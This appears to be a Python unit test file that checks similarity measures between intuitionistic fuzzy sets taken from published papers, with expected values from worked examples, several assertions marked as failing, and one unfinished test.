IANCU_SIMILARITY_20
def test_dengfeng_chuntian():
# Example 1
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
assert_almost_equal(dengfeng_chuntian(A1, B, p=1, weights=None), 0.78, decimal=2)
# assert_almost_equal(dengfeng_chuntian(A2, B, p=1, weights=None), 0.80, decimal=2) # fails
assert_almost_equal(dengfeng_chuntian(A3, B, p=1, weights=None), 0.85, decimal=2)
assert_almost_equal(dengfeng_chuntian(A1, B, p=2, weights=None), 0.74, decimal=2)
assert_almost_equal(dengfeng_chuntian(A2, B, p=2, weights=None), 0.78, decimal=2)
assert_almost_equal(dengfeng_chuntian(A3, B, p=2, weights=None), 0.84, decimal=2)
assert_almost_equal(dengfeng_chuntian(A1, B, p=2, weights=[0.5, 0.3, 0.2]), 0.696, decimal=3)
# assert_almost_equal(dengfeng_chuntian(A2, B, p=2, weights=[0.5, 0.3, 0.2]), 0.779, decimal=3)
assert_almost_equal(dengfeng_chuntian(A3, B, p=2, weights=[0.5, 0.3, 0.2]), 0.853, decimal=3)
def test_liang_shi():
A1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.9, 0.9, 0.1])
A2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.7, 0.2])
A3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.8, 0.2, 0.6])
B = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.6, 0.8, 0.2])
# Example 1
assert_almost_equal(liang_shi(A1, B, similarity_type=LIANG_SHI_SIMILARITY_1, p=1), 0.83, decimal=2)
assert_almost_equal(liang_shi(A2, B, similarity_type=LIANG_SHI_SIMILARITY_1, p=1), 0.93, decimal=2)
assert_almost_equal(liang_shi(A3, B, similarity_type=LIANG_SHI_SIMILARITY_1, p=1), 0.60, decimal=2)
# Example 2 # fails
assert_almost_equal(liang_shi(A1, B, similarity_type=LIANG_SHI_SIMILARITY_2, p=1), 0.92, decimal=2)
assert_almost_equal(liang_shi(A2, B, similarity_type=LIANG_SHI_SIMILARITY_2, p=1), 0.97, decimal=2)
assert_almost_equal(liang_shi(A3, B, similarity_type=LIANG_SHI_SIMILARITY_2, p=1), 0.77, decimal=2)
# Example 3
assert_almost_equal(liang_shi(A1, B, similarity_type=LIANG_SHI_SIMILARITY_3, p=1, omegas=[1.0 / 3.0, 1.0 / 3.0, 1.0 / 3.0]), 0.89, decimal=2)
assert_almost_equal(liang_shi(A2, B, similarity_type=LIANG_SHI_SIMILARITY_3, p=1, omegas=[1.0 / 3.0, 1.0 / 3.0, 1.0 / 3.0]), 0.95, decimal=2)
assert_almost_equal(liang_shi(A3, B, similarity_type=LIANG_SHI_SIMILARITY_3, p=1, omegas=[1.0 / 3.0, 1.0 / 3.0, 1.0 / 3.0]), 0.72, decimal=2)
def test_park_kwun_lin():
A1 = IntuitionisticFuzzySet([0.2, 0.1, 0.0], [0.6, 0.7, 0.6])
A2 = IntuitionisticFuzzySet([0.2, 0.0, 0.2], [0.6, 0.6, 0.8])
A3 = IntuitionisticFuzzySet([0.1, 0.2, 0.2], [0.5, 0.7, 0.8])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.7, 0.8, 0.7])
assert_almost_equal(park_kwun_lim(A1, B), 0.800, decimal=3)
assert_almost_equal(park_kwun_lim(A2, B), 0.733, decimal=3)
assert_almost_equal(park_kwun_lim(A3, B), 0.767, decimal=3)
def test_mitchell():
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
def test_julian_hung_lin():
pass
def test_hung_yang_1():
# Example 1
A1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
A2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
assert_almost_equal(hung_yang_1(A1, B), 1.00, decimal=2)
assert_almost_equal(hung_yang_1(A2, B), 0.933, decimal=3)
assert_almost_equal(hung_yang_1(A3, B), 0.800, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='c'), 1.00, decimal=2)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='c'), 0.875, decimal=3)
assert_almost_equal(hung_yang_1(A3, B, similarity_type='c'), 0.667, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='e'), 1.00, decimal=2)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='e'), 0.898, decimal=3)
assert_almost_equal(hung_yang_1(A3, B, similarity_type='e'), 0.713, decimal=3)
# Example 2
A1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.3, 0.3, 0.3])
A2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3])
assert_almost_equal(hung_yang_1(A1, B), 0.900, decimal=3)
assert_almost_equal(hung_yang_1(A2, B), 0.833, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='c'), 0.818, decimal=3)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='c'), 0.714, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='e'), 0.849, decimal=3)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='e'), 0.757, decimal=3)
# Example 3
A1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.9, 0.9, 0.1])
A2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.7, 0.2])
A3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.8, 0.2, 0.6])
B = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.6, 0.8, 0.2])
assert_almost_equal(hung_yang_1(A1, B), 0.833, decimal=3)
assert_almost_equal(hung_yang_1(A2, B), 0.933, decimal=3)
assert_almost_equal(hung_yang_1(A3, B), 0.567, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='c'), 0.714, decimal=2)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='c'), 0.875, decimal=3)
assert_almost_equal(hung_yang_1(A3, B, similarity_type='c'), 0.395, decimal=3)
assert_almost_equal(hung_yang_1(A1, B, similarity_type='e'), 0.757, decimal=3)
assert_almost_equal(hung_yang_1(A2, B, similarity_type='e'), 0.898, decimal=3)
assert_almost_equal(hung_yang_1(A3, B, similarity_type='e'), 0.444, decimal=3)
def test_ye():
# Example 1
C1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
C2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
C3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
Q = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
assert_almost_equal(ye(C1, Q), 0.9353, decimal=4)
assert_almost_equal(ye(C2, Q), 0.9519, decimal=4)
assert_almost_equal(ye(C3, Q), 0.9724, decimal=4)
weights = [0.5, 0.3, 0.2]
assert_almost_equal(ye(C1, Q, weights=weights), 0.9133, decimal=4)
assert_almost_equal(ye(C2, Q, weights=weights), 0.9404, decimal=4)
assert_almost_equal(ye(C3, Q, weights=weights), 0.9712, decimal=4)
viral_fever = IntuitionisticFuzzySet([0.4, 0.3, 0.1, 0.4, 0.1],
[0.0, 0.5, 0.7, 0.3, 0.7])
malaria = IntuitionisticFuzzySet([0.7, 0.2, 0.0, 0.7, 0.1], [0.0, 0.6, 0.9, 0.0, 0.8])
typhoid = IntuitionisticFuzzySet([0.3, 0.6, 0.2, 0.2, 0.1], [0.3, 0.1, 0.7, 0.6, 0.9])
stomach_problem = IntuitionisticFuzzySet([0.1, 0.2, 0.8, 0.2, 0.2], [
0.7, 0.4, 0.0, 0.7, 0.7])
chest_problem = IntuitionisticFuzzySet([0.1, 0.0, 0.2, 0.2, 0.8], [
0.8, 0.8, 0.8, 0.8, 0.1])
patient = IntuitionisticFuzzySet([0.8, 0.6, 0.2, 0.6, 0.1], [0.1, 0.1, 0.8, 0.1, 0.6])
assert_almost_equal(ye(patient, viral_fever), 0.9046, decimal=4)
assert_almost_equal(ye(patient, malaria), 0.8602, decimal=4) # fails
assert_almost_equal(ye(patient, typhoid), 0.8510, decimal=4)
assert_almost_equal(ye(patient, stomach_problem), 0.5033, decimal=4)
assert_almost_equal(ye(patient, chest_problem), 0.4542, decimal=4) # fails
def test_hwang_yang():
# Example 1
X1A = IntuitionisticFuzzySet([0.3], [0.3])
X1B = IntuitionisticFuzzySet([0.4], [0.4])
assert_almost_equal(hwang_yang(X1A, X1B), 0.997, decimal=3) # fails
X2A = IntuitionisticFuzzySet([0.3], [0.4])
X2B = IntuitionisticFuzzySet([0.4], [0.3])
assert_almost_equal(hwang_yang(X2A, X2B), 0.859, decimal=3)
X3A = IntuitionisticFuzzySet([1.0], [0.0])
X3B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(hwang_yang(X3A, X3B), 0.902, decimal=3)
X4A = IntuitionisticFuzzySet([0.5], [0.5])
X4B = IntuitionisticFuzzySet([0.0], [0.0])
assert_almost_equal(hwang_yang(X4A, X4B), 0.902, decimal=3)
X5A = IntuitionisticFuzzySet([0.4], [0.2])
X5B = IntuitionisticFuzzySet([0.5], [0.3])
assert_almost_equal(hwang_yang(X5A, X5B), 0.995, decimal=3)
X6A = IntuitionisticFuzzySet([0.4], [0.2])
X6B = IntuitionisticFuzzySet([0.5], [0.2])
assert_almost_equal(hwang_yang(X6A, X6B), 0.997, decimal=3)
def test_hung_yang_2():
# Example 1
A1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1], [0.4, 0.6, 0.8])
A2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2], [0.6, 0.6, 0.6])
A3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4], [0.2, 0.2, 0.2])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1], [0.4, 0.6, 0.8])
assert_almost_equal(hung_yang_2(A1, B), 1.00, decimal=2)
assert_almost_equal(hung_yang_2(A2, B), 0.979, decimal=3)
assert_almost_equal(hung_yang_2(A3, B), 0.854, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='c'), 1.00, decimal=2)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='c'), 0.964, decimal=3)
assert_almost_equal(hung_yang_2(A3, B, similarity_type='c'), 0.776, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='e'), 1.00, decimal=2)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='e'), 0.971, decimal=3)
assert_almost_equal(hung_yang_2(A3, B, similarity_type='e'), 0.808, decimal=3)
# Example 2
A1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2], [0.6, 0.6, 0.6])
A2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4], [0.2, 0.2, 0.2])
B = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3], [0.4, 0.4, 0.6])
assert_almost_equal(hung_yang_2(A1, B), 0.974, decimal=3)
assert_almost_equal(hung_yang_2(A2, B), 0.928, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, a=1.5), 0.974, decimal=3)
assert_almost_equal(hung_yang_2(A2, B, a=1.5), 0.928, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='c'), 0.957, decimal=3)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='c'), 0.882, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='e'), 0.964, decimal=3)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='e'), 0.901, decimal=3)
# Example 3 Division with zero
A1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9], [0.8, 0.4, 0.0])
A2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8], [0.0, 0.0, 0.2])
A3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4], [0.1, 0.1, 0.2])
B = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8], [0.2, 0.2, 0.2])
assert_almost_equal(hung_yang_2(A1, B), 0.843, decimal=3)
assert_almost_equal(hung_yang_2(A2, B), 0.927, decimal=3)
assert_almost_equal(hung_yang_2(A3, B), 0.797, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='c'), 0.761, decimal=2)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='c'), 0.883, decimal=3)
assert_almost_equal(hung_yang_2(A3, B, similarity_type='c'), 0.698, decimal=3)
assert_almost_equal(hung_yang_2(A1, B, similarity_type='e'), 0.794, decimal=3)
assert_almost_equal(hung_yang_2(A2, B, similarity_type='e'), 0.902, decimal=3)
assert_almost_equal(hung_yang_2(A3, B, similarity_type='e'), 0.737, decimal=3)
def test_zhang_fu():
# Example 1
A1 = IntuitionisticFuzzySet([0.4, 0.3, 0.5, 0.5, 0.6], [0.4, 0.3, 0.1, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.2, 0.3, 0.2, 0.7, 0.8], [0.6, 0.5, 0.3, 0.1, 0.0])
A3 = IntuitionisticFuzzySet([0.1, 0.0, 0.2, 0.1, 0.2], [0.9, 1.0, 0.7, 0.8, 0.8])
A4 = IntuitionisticFuzzySet([0.8, 0.9, 1.0, 0.7, 0.6], [0.2, 0.0, 0.0, 0.2, 0.4])
A = IntuitionisticFuzzySet([0.3, 0.4, 0.6, 0.5, 0.9], [0.5, 0.4, 0.2, 0.1, 0.0])
assert_almost_equal(zhang_fu(A, A1), 0.884, decimal=3)
assert_almost_equal(zhang_fu(A, A2), 0.870, decimal=3)
assert_almost_equal(zhang_fu(A, A3), 0.449, decimal=3)
assert_almost_equal(zhang_fu(A, A4), 0.671, decimal=3)
def test_hung_yang_3():
# Example 1
A1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
A2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_1), 1.000, decimal=3) # 8
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_1), 0.722, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_1), 0.500, decimal=3)
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_2), 1.000, decimal=3) # 11
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_2), 0.900, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_2), 0.700, decimal=3)
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_3), 1.000, decimal=3) # 10
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_3), 0.714, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_3), 0.500, decimal=3)
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_4), 1.000, decimal=3)
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_4), 0.714, decimal=3) # fails
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_4), 0.500, decimal=3) # fails
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_5), 1.000, decimal=3) # 12
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_5), 0.833, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_5), 0.667, decimal=3)
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_6), 1.000, decimal=3) # 13
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_6), 0.809, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_6), 0.525, decimal=3)
assert_almost_equal(hung_yang_3(A1, B, similarity_type=HUNG_YANG_3_SIMILARITY_7), 1.000, decimal=3) # 14
assert_almost_equal(hung_yang_3(A2, B, similarity_type=HUNG_YANG_3_SIMILARITY_7), 0.783, decimal=3)
assert_almost_equal(hung_yang_3(A3, B, similarity_type=HUNG_YANG_3_SIMILARITY_7), 0.533, decimal=3)
def test_chen_1():
A = IntuitionisticFuzzySet([0.1, 0.2, 0.4, 0.6, 0.8], [0.3, 0.6, 0.8, 0.8, 1.0])
B = IntuitionisticFuzzySet([0.2, 0.3, 0.5, 0.7, 0.9], [0.5, 0.7, 0.8, 0.9, 1.0])
assert_almost_equal(chen_1(A, B, weights=[0.5, 0.8, 1.0, 0.7, 1.0]), 0.90625, decimal=5)
def test_hung_yang_4():
# Example 1
A1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
A2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
assert_almost_equal(hung_yang_4(A1, B, p=2), 1.000, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, p=2), 0.933, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, p=2), 0.800, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='c', p=2), 1.000, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='c', p=2), 0.853, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, similarity_type='c', p=2), 0.624, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='e', p=2), 1.000, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='e', p=2), 0.881, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, similarity_type='e', p=2), 0.675, decimal=3)
# Example 2
A1 = IntuitionisticFuzzySet([0.1, 0.5, 0.1], [0.1, 0.1, 0.9])
A2 = IntuitionisticFuzzySet([0.5, 0.7, 0.0], [0.5, 0.3, 0.8])
A3 = IntuitionisticFuzzySet([0.7, 0.1, 0.4], [0.2, 0.8, 0.4])
B = IntuitionisticFuzzySet([0.4, 0.6, 0.0], [0.4, 0.2, 0.8])
assert_almost_equal(hung_yang_4(A1, B, p=2), 0.833, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, p=2), 0.933, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, p=2), 0.598, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='c', p=2), 0.674, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='c', p=2), 0.853, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, similarity_type='c', p=2), 0.381, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='e', p=2), 0.723, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='e', p=2), 0.881, decimal=3)
assert_almost_equal(hung_yang_4(A3, B, similarity_type='e', p=2), 0.427, decimal=3)
# Example 3
A1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3])
assert_almost_equal(hung_yang_4(A1, B, p=2), 0.900, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, p=2), 0.859, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='c', p=2), 0.788, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='c', p=2), 0.716, decimal=3)
assert_almost_equal(hung_yang_4(A1, B, similarity_type='e', p=2), 0.826, decimal=3)
assert_almost_equal(hung_yang_4(A2, B, similarity_type='e', p=2), 0.761, decimal=3)
def test_hong_kim():
#Example 1
A = IntuitionisticFuzzySet([0.8, 0.3, 0.4], [0.9, 0.5, 0.6])
B = IntuitionisticFuzzySet([0.9, 0.0, 0.8], [0.9, 0.0, 0.9])
assert_almost_equal(hong_kim(A, B, weights=None), 0.7333, decimal=4)
def test_chen_2():
# Example 1
A = IntuitionisticFuzzySet([0.8, 0.3, 0.4], [0.9, 0.5, 0.6])
B = IntuitionisticFuzzySet([0.9, 0.0, 0.8], [0.9, 0.0, 0.9])
assert_almost_equal(chen_2(A, B, weights=None), 0.7333, decimal=4)
def test_liu():
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0], [0.1, 0.0, 0.1])
A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0], [0.2, 0.2, 0.0])
B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1], [0.2, 0.2, 0.1])
assert_almost_equal(liu(A1, B, p=2), 0.72, decimal=2)
assert_almost_equal(liu(A2, B, p=2), 0.74, decimal=2)
assert_almost_equal(liu(A3, B, p=2), 0.84, decimal=2)
def test_iancu():
# Example 1
A1 = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
A2 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A3 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.2, 0.1], [0.3, 0.2, 0.1])
assert_almost_equal(iancu(A1, B, similarity_type=IANCU_SIMILARITY_1), 1.000, decimal=3)
assert_almost_equal(iancu(A2, B, similarity_type=IANCU_SIMILARITY_1), 1.000, decimal=3)
assert_almost_equal(iancu(A3, B, similarity_type=IANCU_SIMILARITY_1), 1.000, decimal=3)
assert_almost_equal(iancu(A1, B, similarity_type=IANCU_SIMILARITY_2), 1.000, decimal=3)
assert_almost_equal(iancu(A2, B, similarity_type=IANCU_SIMILARITY_2), 1.000, decimal=3)
assert_almost_equal(iancu(A3, B, similarity_type=IANCU_SIMILARITY_2), 1.000, decimal=3)
# fail
assert_almost_equal(iancu(A1, B, similarity_type=IANCU_SIMILARITY_9), 1.000, decimal=3)
assert_almost_equal(iancu(A2, B, similarity_type=IANCU_SIMILARITY_9), 0.938, decimal=3)
assert_almost_equal(iancu(A3, B, similarity_type=IANCU_SIMILARITY_9), 0.833, decimal=3)
# fail
assert_almost_equal(iancu(A1, B, similarity_type=IANCU_SIMILARITY_10), 1.000, decimal=3)
assert_almost_equal(iancu(A2, B, similarity_type=IANCU_SIMILARITY_10), 0.938, decimal=3)
assert_almost_equal(iancu(A3, B, similarity_type=IANCU_SIMILARITY_10), 0.833, decimal=3)
A1 = IntuitionisticFuzzySet([0.2, 0.2, 0.2], [0.2, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.4, 0.4, 0.4], [0.4, 0.4, 0.4])
B = IntuitionisticFuzzySet([0.3, 0.3, 0.1], [0.3, 0.3, 0.3])
assert_almost_equal(iancu(A1, B), 0.933, decimal=3)
assert_almost_equal(iancu(A2, B), 0.933, decimal=3)
assert_almost_equal(iancu(A1, B, similarity_type=IANCU_SIMILARITY_7), 0.938, decimal=3) # fails
assert_almost_equal(iancu(A2, B, similarity_type=IANCU_SIMILARITY_7), 0.938, decimal=3)
def test_song_wang_lei_xue():
# Example 1
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1], [0.0, 0.2, 0.2])
A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0], [0.1, 0.0, 0.1])
A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0], [0.2, 0.2, 0.0])
B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1], [0.2, 0.2, 0.1])
assert_almost_equal(song_wang_lei_xue(A1, B), 0.887, decimal=3)
assert_almost_equal(song_wang_lei_xue(A2, B), 0.913, decimal=3)
assert_almost_equal(song_wang_lei_xue(A3, B), 0.936, decimal=3)
assert_almost_equal(song_wang_lei_xue(A1, B, weights=[0.5, 0.3, 0.2]), 0.853, decimal=3)
assert_almost_equal(song_wang_lei_xue(A2, B, weights=[0.5, 0.3, 0.2]), 0.919, decimal=3)
assert_almost_equal(song_wang_lei_xue(A3, B, weights=[0.5, 0.3, 0.2]), 0.949, decimal=3)
def test_deng_jiang_fu():
A1 = IntuitionisticFuzzySet([1.0, 0.8, 0.7], [0.0, 0.0, 0.1])
A2 = IntuitionisticFuzzySet([0.8, 1.0, 0.9], [0.1, 0.0, 0.0])
A3 = IntuitionisticFuzzySet([0.6, 0.8, 1.0], [0.2, 0.0, 0.0])
B = IntuitionisticFuzzySet([0.5, 0.6, 0.8], [0.3, 0.2, 0.1])
# Example 2
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_1), 0.489, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_1), 0.458, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_1), 0.546, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_2), 0.454, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_2), 0.444, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_2), 0.541, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.625, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.615, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_1_3, p=1), 0.702, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_1), 0.681, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_1), 0.668, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_1), 0.745, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_2), 0.658, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_2), 0.658, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_2), 0.743, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.783, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.783, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_3, p=1), 0.850, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_4), 0.644, decimal=3)
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_4), 0.644, decimal=3)
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_2_4), 0.739, decimal=3)
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.593, decimal=3) # fails
assert_almost_equal(deng_jiang_fu(A2, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.593, decimal=3) # fails
assert_almost_equal(deng_jiang_fu(A3, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_1, p=1), 0.700, decimal=3) # fails
assert_almost_equal(deng_jiang_fu(A1, B, DENG_JIANG_FU_MONOTONIC_TYPE_3_2, p=2, u=0.5, v=0.5), 0.928, decimal=3)
